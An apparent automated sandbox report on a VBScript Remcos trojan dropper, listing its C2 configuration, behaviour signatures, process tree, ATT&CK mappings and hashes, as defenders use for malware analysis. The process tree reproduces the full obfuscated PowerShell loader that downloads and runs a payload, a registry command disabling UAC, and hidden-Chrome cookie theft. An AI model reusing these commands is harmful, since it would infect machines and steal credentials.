Overview

overview

10

Static

static

1

z34SOLICITUDDEP.vbs

windows7-x64

10

z34SOLICITUDDEP.vbs

windows10-2004-x64

10

Resubmissions

27-11-2024 14:34

241127-rxft1sxlfs 10

27-11-2024 14:30

241127-rt7hkaxkf1 10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    27-11-2024 14:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    z34SOLICITUDDEP.vbs

  • Size

    33KB

  • MD5

    f6a1927833d8bdbed39158eeb8fec038

  • SHA1

    d166a956aee76d8c1a17b97905a2a554d71cd796

  • SHA256

    674affabc23dacf7e1dd9f1c663589f1c1f3a8383037f2cb1a547d48beaf34b9

  • SHA512

    6507a607f9964a923a40fdc329b3a1c5b9a36f5afb72129808a6a1121afa1c686c195a7cb8d3781e634d997ffded8b90a5a933bc9f3b06250be127373823b240

  • SSDEEP

    768:hFiasUNgXGy5FMJerHSLNj0Z6AkhZw7XJuBbVVjgHraV:jiasj5zH+GZ6v/w78XNgHuV

Score
10/10
remcosremotehostcollectioncredential_accessdiscoveryevasionexecutionratstealertrojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

234d34gb6.duckdns.org:3613

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-CPWWCP

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 13 IoCs
  • Uses browser remote debugging 2 TTPs 4 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

    credential_accessstealer
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 48 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\z34SOLICITUDDEP.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:1520
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Efteruddannelseskurser='Aabenbaringen';;$Overordentligt233='Lumbayao';;$Sacket='Eggcupful';;$Procrypsis197='Betle';;$Stvknappernemponderableness='Baandtlleren';;$Dbendes=$host.Name;function Tehandelens($lugger){If ($Dbendes) {$sorbeten=4} for ($Stvknapperne=$sorbeten;;$Stvknapperne+=5){if(!$lugger[$Stvknapperne]) { break }$Rinjin+=$lugger[$Stvknapperne]}$Rinjin}function Bacillite($fitchburg){ .($Willard) ($fitchburg)}$Steamfitter=Tehandelens 'NonfNmanuEKosmTlu,e.Br sW XeneShoeB Perc GallLe tImo sE Refn pydT';$Sourdeline=Tehandelens 'UnyoMko.toTr.ez va iInd lL.nilParaaRogn/';$Biliteral=Tehandelens 'FldeTUnd l yhesDele1En.y2';$Peed='Spen[ManiN HusETillTClus.FljksFlise S,rRrekrvRi eiUndeC EncEGradpMaleoHuslIRequnSymoTR fiM reA T enSkamaKlargMiljEKontRUnsn]Macc:serv:kldeS ncEL ndCI dluApplrPlatiIne.tRecrYNebepTiborAcalOPackTCan OcenoCTe,sOKon l Kol=Tth $TorvBUnrei Gonl OptI GleTUnmoEFngsREpita B aL';$Sourdeline+=Tehandelens ' hae5 Sur.Heng0Skov Udle( Pe.W oksiN nen CaldTeleoEr.vwFuldsTrus OrdfNCin TJ,co Inse1Enke0 Bre.Ange0 Ng ;Zyg F,rsWUnexiFissnCosm6.ina4Bulb;Brov ffix ,rg6Bok.4 ort;Co,m Kul,rCompvBlac:Co,v1 for3Job,1Phot.Pr.a0B,lg)Tran Enk.Ggaa.eIndfcun,ikWienoAppl/,elg2Pena0Fusu1 ips0al.e0Samm1Prot0,nlb1Ch l Gat F SesiPleorMouge Vurf.oneoStalxPrem/Euhe1Feri3Eret1Util. Swi0';$Remarking141=Tehandelens ' PolUDoxis tjeEProsr ras-MornaSperGCinde CitNNeedt';$Syntaksanalyseredes=Tehandelens 'Besth egtBispt aggp ColsBehr:Advo/Ufor/PhosdMastrUndei BrovForleSixt.LrregBredo psio ilgls el BloeTr.c.overcCoa.oBag m Spk/Aftru TercAppo? mbleHavrx,ivepPitco Mo rVexet Bo =FrapdBolioStoew Ka nGlanl Dyno StjaTaardKlog&Antii Cald sca=Erot1BlebbCaskV Li 7 pomRubbEMastuBol y Co YpersTNaepHHy.eTmarl5Syll4UdskHSam,GSoluIRidsdpancINo,kdPecuE.upexGnatOPolyePelaBud.rzV rs_Forr8Narc1 anoxSletI BehE Enrd';$Paafuglefjerens=Tehandelens 'Nico>';$Willard=Tehandelens 'Pos ItranEcoucX';$Acidosteophyte='Chough140';$Chemitypy='\Suspensioners.Aut';Bacillite (Tehandelens 'bisp$ApplgGermlvakao PasBsexuAAerol Ple:AchitCherA AfhgDestaPneusreprs D lUMi.sIf rsDJydeaGastEVa r=Sh t$ReenE Id.N PilVLav :Za nAgra PBeskPUndiDRes A KreTRen arigs+ Eur$limpcIndmhMoraeQuanml,ngi.yrtTNondy TarpAfb Y');Bacillite (Tehandelens 'Bir $ ,atgRep L EmbO Re.b A baTidolCo,t:PensUU koNf,igTFor hBeskiInveeB ggvStrmI SanSsludhmi i=Tusn$ KkkScrusY DynnE,anTNavlaF,rhkNonaS GaaaStvvN quoaD,egL Ry,YTedesji,pE ongRPsi EMes dB gsERatisDivi.GastSHypopStrulJordILet,tFric(Ork $SphiPVirka,aliA Petf,latU Th gA.epLdannecommFskelJAm uEEmhtR ,kve sp n SkaSKon )');Bacillite (Tehandelens $Peed);$Syntaksanalyseredes=$Unthievish[0];$Kirsty4=(Tehandelens 'S.lv$PastGpostlAlopoBillBGu nAI epLCl,a: Re,PFilmIJengGBuhkESedjoTr snUnwiAMahobNon lraflEArte=KrftnAmmoeGespWH.rr-Ji,gOHin bTeksJMucoe noncFrgetUdru RefisFdelYmusiSCol,T,ddeEStreM Kv .turn$ Cyks PaltH.erEAwara rypMIl iF AariFr gt AveTBicueKlicR');Bacillite ($Kirsty4);Bacillite (Tehandelens 'Un,u$SeksPHy oi .org BageAymeoSnidn CraaSkribMalalAut,eArbe. ebeHTy.aeDaadaventdEfteeen lr.icasKred[Prag$objeR araeSe vm AnnaSvu,rUdekkParsiDr onFedtgembr1Dkke4 A.n1.eku]B am=Harz$IrriSRicholeviuNskerFusidUnsue NeplTumbi,okenSve e');$Tromlers224=Tehandelens 'Kryp$ BrnPWarri BekgBanae ForoHeglnBe eaAn,eb nralLease A.t.Kkk,D Grao ypsw Pr.nInfolRaadoRa.taNeutd SauFOrniiBismlUnree Ant(expe$Se tSLejey,onnn CohtDataa PrekOplesPrewa Omtn CenaU,pal AmoyMells.homeTriwr U.def eldHe rePerfsJegr,Auto$HamsP Vo n,ongtRoad)';$Pnt=$tagassuidae;Bacillite (Tehandelens 'Oste$Albug ClelRecoOCataBTheiA Gl lForf:Compn G iE undeNin,DPumpLSmoke DifD.ard= Dve( igtSpirEDampSIndtt N l- leP Stea iriTBenghF,kh Insi$Coehp iteNDicrTdrae)');while (!$Needled) {Bacillite (Tehandelens 'th,r$AntigKnytlTilloS.lpbUrovaPe ll g h:H,ssU uddS kksR leaP eil Karg Huls Has=Star$ Ar.E GlunParteLuftcunageElixlSvejl BareKa enSamfs') ;Bacillite $Tromlers224;Bacillite (Tehandelens 'mo.tsNo.nTSpr aCon,RPlactHead-CaulSMilil PaaEPersegi tpSkim Ret4');Bacillite (Tehandelens '.vrt$ iniGmarkLRealo UroB k ra Bo lRedo: BasnKernE onsePhacd En lForlexenoD Tei=C pe(ParaT AskeBlgesBa yTBerm- aduPA elaBry,TA oihOpda Grin$TrknPLageNLondTo no)') ;Bacillite (Tehandelens ' Ven$Facig SkrL ingO BrubBesta S al Pri:DillPKorrSSk lI Coil Un a B,nN Ko tbracHRuskrHypoOK ltpMoorITales erkmRe,m2bone4Fasa0I.fi=Nasu$Mo oGpe,sl rumOurosB VaaAEranLFoye: ForTtredz EleiSnegmFysiMKnogeVarmS Bry+Bold+Anno%Mi,b$EarruuretnUdbrtUnm,H entIDe.oEYng v ZetiA tiSFestHreca.flleCTormORepeU,lurNSaucT') ;$Syntaksanalyseredes=$Unthievish[$Psilanthropism240]}$Recaps=312553;$Slvklos=30447;Bacillite (Tehandelens 'Bilt$SandgLi.hL LovOsc.lB S.aAReimlSpec:F,ersPretUHandBSideD U le DevdMicruRoacCDobbiBrndBBrunlWheyEBrne Bran=Ov.r SaurGFeste SomTK,ar- emicCybeO Be,nTurnt.asseRoseNf,iptBiss Cap.$ WriPPa kNKan T');Bacillite (Tehandelens 'Anlg$fouegFyrrl UndoMegabA oma S plUnre:HandMHan.aPycnrSta iUn.co EpilGoklaCo r Tip=Zeun Be y[SlsfSPatoyViolsInditEmote M nm ete. ScrCJagto No.nBeauvTableAfknr ufft Fir]kata: Pos: PunFS mmrsklsoBr lmBekeBVib aMo gsmetreMejs6Cosc4PleuSObrotReber ClaiOvern Subg Bry( Par$rataSheteu Rinb C ed T aeGingdBrinuReincOve,i kimbFashlT oreey i)');Bacillite (Tehandelens 'Peri$ O tgO teLbefaorumkBKlodABio lRump:gypsH pekyRunkg FarrH.tuOS,atGCa uRKnapAluteMcent Cata=Innu Prae[MicrSMartyS ndsCompTPro EHalamBack.FaveTAftreTvanXstyrtadg,.RosseC ypn,tjfc ivio RocdUno.i DemnesopgBigu],oni:Jv h:TriuaFo esB,llcAms i CyciPou..DesigS ejECheeTInfisWilitLicerTec,i eckN UrogVirk(Cha $ atamzebrA rerConsITrykoInitlProfaFair)');Bacillite (Tehandelens 'Non $Yng,GAnorLKoo.OCl sbLysnA Co lca,s:Co iFper LNyheUBenaSUappkmateeMer rKomm=Al.o$ FemH onmyOphtGSondRUdspo opsgHortrU.huaInteMFlyv.,ears.abiUHa.nbBri,S Blet SenRMudsiMakrNRjseG Ind(Mikr$ nchR olkED micDiffABlaaPVirkSKulh,Thri$ OxiSInclLBlegvTranKA omL sano S as ko)');Bacillite $flusker;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2076
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Efteruddannelseskurser='Aabenbaringen';;$Overordentligt233='Lumbayao';;$Sacket='Eggcupful';;$Procrypsis197='Betle';;$Stvknappernemponderableness='Baandtlleren';;$Dbendes=$host.Name;function Tehandelens($lugger){If ($Dbendes) {$sorbeten=4} for ($Stvknapperne=$sorbeten;;$Stvknapperne+=5){if(!$lugger[$Stvknapperne]) { break }$Rinjin+=$lugger[$Stvknapperne]}$Rinjin}function Bacillite($fitchburg){ .($Willard) ($fitchburg)}$Steamfitter=Tehandelens 'NonfNmanuEKosmTlu,e.Br sW XeneShoeB Perc GallLe tImo sE Refn pydT';$Sourdeline=Tehandelens 'UnyoMko.toTr.ez va iInd lL.nilParaaRogn/';$Biliteral=Tehandelens 'FldeTUnd l yhesDele1En.y2';$Peed='Spen[ManiN HusETillTClus.FljksFlise S,rRrekrvRi eiUndeC EncEGradpMaleoHuslIRequnSymoTR fiM reA T enSkamaKlargMiljEKontRUnsn]Macc:serv:kldeS ncEL ndCI dluApplrPlatiIne.tRecrYNebepTiborAcalOPackTCan OcenoCTe,sOKon l Kol=Tth $TorvBUnrei Gonl OptI GleTUnmoEFngsREpita B aL';$Sourdeline+=Tehandelens ' hae5 Sur.Heng0Skov Udle( Pe.W oksiN nen CaldTeleoEr.vwFuldsTrus OrdfNCin TJ,co Inse1Enke0 Bre.Ange0 Ng ;Zyg F,rsWUnexiFissnCosm6.ina4Bulb;Brov ffix ,rg6Bok.4 ort;Co,m Kul,rCompvBlac:Co,v1 for3Job,1Phot.Pr.a0B,lg)Tran Enk.Ggaa.eIndfcun,ikWienoAppl/,elg2Pena0Fusu1 ips0al.e0Samm1Prot0,nlb1Ch l Gat F SesiPleorMouge Vurf.oneoStalxPrem/Euhe1Feri3Eret1Util. Swi0';$Remarking141=Tehandelens ' PolUDoxis tjeEProsr ras-MornaSperGCinde CitNNeedt';$Syntaksanalyseredes=Tehandelens 'Besth egtBispt aggp ColsBehr:Advo/Ufor/PhosdMastrUndei BrovForleSixt.LrregBredo psio ilgls el BloeTr.c.overcCoa.oBag m Spk/Aftru TercAppo? mbleHavrx,ivepPitco Mo rVexet Bo =FrapdBolioStoew Ka nGlanl Dyno StjaTaardKlog&Antii Cald sca=Erot1BlebbCaskV Li 7 pomRubbEMastuBol y Co YpersTNaepHHy.eTmarl5Syll4UdskHSam,GSoluIRidsdpancINo,kdPecuE.upexGnatOPolyePelaBud.rzV rs_Forr8Narc1 anoxSletI BehE Enrd';$Paafuglefjerens=Tehandelens 'Nico>';$Willard=Tehandelens 'Pos ItranEcoucX';$Acidosteophyte='Chough140';$Chemitypy='\Suspensioners.Aut';Bacillite (Tehandelens 'bisp$ApplgGermlvakao PasBsexuAAerol Ple:AchitCherA AfhgDestaPneusreprs D lUMi.sIf rsDJydeaGastEVa r=Sh t$ReenE Id.N PilVLav :Za nAgra PBeskPUndiDRes A KreTRen arigs+ Eur$limpcIndmhMoraeQuanml,ngi.yrtTNondy TarpAfb Y');Bacillite (Tehandelens 'Bir $ ,atgRep L EmbO Re.b A baTidolCo,t:PensUU koNf,igTFor hBeskiInveeB ggvStrmI SanSsludhmi i=Tusn$ KkkScrusY DynnE,anTNavlaF,rhkNonaS GaaaStvvN quoaD,egL Ry,YTedesji,pE ongRPsi EMes dB gsERatisDivi.GastSHypopStrulJordILet,tFric(Ork $SphiPVirka,aliA Petf,latU Th gA.epLdannecommFskelJAm uEEmhtR ,kve sp n SkaSKon )');Bacillite (Tehandelens $Peed);$Syntaksanalyseredes=$Unthievish[0];$Kirsty4=(Tehandelens 'S.lv$PastGpostlAlopoBillBGu nAI epLCl,a: Re,PFilmIJengGBuhkESedjoTr snUnwiAMahobNon lraflEArte=KrftnAmmoeGespWH.rr-Ji,gOHin bTeksJMucoe noncFrgetUdru RefisFdelYmusiSCol,T,ddeEStreM Kv .turn$ Cyks PaltH.erEAwara rypMIl iF AariFr gt AveTBicueKlicR');Bacillite ($Kirsty4);Bacillite (Tehandelens 'Un,u$SeksPHy oi .org BageAymeoSnidn CraaSkribMalalAut,eArbe. ebeHTy.aeDaadaventdEfteeen lr.icasKred[Prag$objeR araeSe vm AnnaSvu,rUdekkParsiDr onFedtgembr1Dkke4 A.n1.eku]B am=Harz$IrriSRicholeviuNskerFusidUnsue NeplTumbi,okenSve e');$Tromlers224=Tehandelens 'Kryp$ BrnPWarri BekgBanae ForoHeglnBe eaAn,eb nralLease A.t.Kkk,D Grao ypsw Pr.nInfolRaadoRa.taNeutd SauFOrniiBismlUnree Ant(expe$Se tSLejey,onnn CohtDataa PrekOplesPrewa Omtn CenaU,pal AmoyMells.homeTriwr U.def eldHe rePerfsJegr,Auto$HamsP Vo n,ongtRoad)';$Pnt=$tagassuidae;Bacillite (Tehandelens 'Oste$Albug ClelRecoOCataBTheiA Gl lForf:Compn G iE undeNin,DPumpLSmoke DifD.ard= Dve( igtSpirEDampSIndtt N l- leP Stea iriTBenghF,kh Insi$Coehp iteNDicrTdrae)');while (!$Needled) {Bacillite (Tehandelens 'th,r$AntigKnytlTilloS.lpbUrovaPe ll g h:H,ssU uddS kksR leaP eil Karg Huls Has=Star$ Ar.E GlunParteLuftcunageElixlSvejl BareKa enSamfs') ;Bacillite $Tromlers224;Bacillite (Tehandelens 'mo.tsNo.nTSpr aCon,RPlactHead-CaulSMilil PaaEPersegi tpSkim Ret4');Bacillite (Tehandelens '.vrt$ iniGmarkLRealo UroB k ra Bo lRedo: BasnKernE onsePhacd En lForlexenoD Tei=C pe(ParaT AskeBlgesBa yTBerm- aduPA elaBry,TA oihOpda Grin$TrknPLageNLondTo no)') ;Bacillite (Tehandelens ' Ven$Facig SkrL ingO BrubBesta S al Pri:DillPKorrSSk lI Coil Un a B,nN Ko tbracHRuskrHypoOK ltpMoorITales erkmRe,m2bone4Fasa0I.fi=Nasu$Mo oGpe,sl rumOurosB VaaAEranLFoye: ForTtredz EleiSnegmFysiMKnogeVarmS Bry+Bold+Anno%Mi,b$EarruuretnUdbrtUnm,H entIDe.oEYng v ZetiA tiSFestHreca.flleCTormORepeU,lurNSaucT') ;$Syntaksanalyseredes=$Unthievish[$Psilanthropism240]}$Recaps=312553;$Slvklos=30447;Bacillite (Tehandelens 'Bilt$SandgLi.hL LovOsc.lB S.aAReimlSpec:F,ersPretUHandBSideD U le DevdMicruRoacCDobbiBrndBBrunlWheyEBrne Bran=Ov.r SaurGFeste SomTK,ar- emicCybeO Be,nTurnt.asseRoseNf,iptBiss Cap.$ WriPPa kNKan T');Bacillite (Tehandelens 'Anlg$fouegFyrrl UndoMegabA oma S plUnre:HandMHan.aPycnrSta iUn.co EpilGoklaCo r Tip=Zeun Be y[SlsfSPatoyViolsInditEmote M nm ete. ScrCJagto No.nBeauvTableAfknr ufft Fir]kata: Pos: PunFS mmrsklsoBr lmBekeBVib aMo gsmetreMejs6Cosc4PleuSObrotReber ClaiOvern Subg Bry( Par$rataSheteu Rinb C ed T aeGingdBrinuReincOve,i kimbFashlT oreey i)');Bacillite (Tehandelens 'Peri$ O tgO teLbefaorumkBKlodABio lRump:gypsH pekyRunkg FarrH.tuOS,atGCa uRKnapAluteMcent Cata=Innu Prae[MicrSMartyS ndsCompTPro EHalamBack.FaveTAftreTvanXstyrtadg,.RosseC ypn,tjfc ivio RocdUno.i DemnesopgBigu],oni:Jv h:TriuaFo esB,llcAms i CyciPou..DesigS ejECheeTInfisWilitLicerTec,i eckN UrogVirk(Cha $ atamzebrA rerConsITrykoInitlProfaFair)');Bacillite (Tehandelens 'Non $Yng,GAnorLKoo.OCl sbLysnA Co lca,s:Co iFper LNyheUBenaSUappkmateeMer rKomm=Al.o$ FemH onmyOphtGSondRUdspo opsgHortrU.huaInteMFlyv.,ears.abiUHa.nbBri,S Blet SenRMudsiMakrNRjseG Ind(Mikr$ nchR olkED micDiffABlaaPVirkSKulh,Thri$ OxiSInclLBlegvTranKA omL sano S as ko)');Bacillite $flusker;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2760
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3024
      • C:\Windows\SysWOW64\cmd.exe
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2016
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:2992
      • C:\Program Files\Google\Chrome\Application\Chrome.exe
        --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
        3⤵
        • Uses browser remote debugging
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2240
        • C:\Program Files\Google\Chrome\Application\Chrome.exe
          "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef6df9758,0x7fef6df9768,0x7fef6df9778
          4⤵
            PID:1908
          • C:\Program Files\Google\Chrome\Application\Chrome.exe
            "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1136 --field-trial-handle=1296,i,12212517242423504298,13715240435539041788,131072 /prefetch:2
            4⤵
              PID:1952
            • C:\Program Files\Google\Chrome\Application\Chrome.exe
              "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1500 --field-trial-handle=1296,i,12212517242423504298,13715240435539041788,131072 /prefetch:8
              4⤵
                PID:1972
              • C:\Program Files\Google\Chrome\Application\Chrome.exe
                "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1564 --field-trial-handle=1296,i,12212517242423504298,13715240435539041788,131072 /prefetch:8
                4⤵
                  PID:1604
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2128 --field-trial-handle=1296,i,12212517242423504298,13715240435539041788,131072 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:1580
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2152 --field-trial-handle=1296,i,12212517242423504298,13715240435539041788,131072 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:1584
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2532 --field-trial-handle=1296,i,12212517242423504298,13715240435539041788,131072 /prefetch:8
                  4⤵
                    PID:1624
                  • C:\Program Files\Google\Chrome\Application\Chrome.exe
                    "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3032 --field-trial-handle=1296,i,12212517242423504298,13715240435539041788,131072 /prefetch:1
                    4⤵
                    • Uses browser remote debugging
                    PID:2424
                  • C:\Program Files\Google\Chrome\Application\Chrome.exe
                    "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=3508 --field-trial-handle=1296,i,12212517242423504298,13715240435539041788,131072 /prefetch:2
                    4⤵
                      PID:2324
                  • C:\Windows\SysWOW64\msiexec.exe
                    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\kjsohaylqlxjfn"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:800
                  • C:\Windows\SysWOW64\msiexec.exe
                    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\mdfyisjfetpwptjfz"
                    3⤵
                    • Accesses Microsoft Outlook accounts
                    • System Location Discovery: System Language Discovery
                    PID:2340
                  • C:\Windows\SysWOW64\msiexec.exe
                    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\wylriltgsbhbszyjqgja"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2384
              • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                1⤵
                  PID:1228

                Network

                MITRE ATT&CK Enterprise v15

                Reconnaissance

                Resource Development

                Initial Access

                Execution

                Command and Scripting Interpreter

                1
                T1059

                PowerShell

                1
                T1059.001

                Persistence

                Modify Authentication Process

                1
                T1556

                Privilege Escalation

                Abuse Elevation Control Mechanism

                1
                T1548

                Bypass User Account Control

                1
                T1548.002

                Defense Evasion

                Abuse Elevation Control Mechanism

                1
                T1548

                Bypass User Account Control

                1
                T1548.002

                Impair Defenses

                1
                T1562

                Disable or Modify Tools

                1
                T1562.001

                Modify Authentication Process

                1
                T1556

                Modify Registry

                2
                T1112

                Credential Access

                Modify Authentication Process

                1
                T1556

                Steal Web Session Cookie

                1
                T1539

                Discovery

                Query Registry

                1
                T1012

                System Information Discovery

                1
                T1082

                System Location Discovery

                1
                T1614

                System Language Discovery

                1
                T1614.001

                Lateral Movement

                Collection

                Email Collection

                1
                T1114

                Command and Control

                Web Service

                1
                T1102

                Exfiltration

                Impact

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\ProgramData\remcos\logs.dat
                  Filesize

                  144B

                  MD5

                  807348b481956a62eda0f6b1fa1d6118

                  SHA1

                  589ea0be4a7fe3611b337418e0483edfe5b09103

                  SHA256

                  61de1ad3da89acc8e41b408cc27e59687524d096d3448f39a144e7b7e13e34c5

                  SHA512

                  eb8c9ef16ad06879d37247b04b5836d134eb3ddd160c7b9a15c8ceaf84f4d64dec726a2a742606b258d21ca16061b48da061b3ba1a4c51afcaf181d447301e7c

                  Download Submit

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199
                  Filesize

                  854B

                  MD5

                  e935bc5762068caf3e24a2683b1b8a88

                  SHA1

                  82b70eb774c0756837fe8d7acbfeec05ecbf5463

                  SHA256

                  a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d

                  SHA512

                  bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e

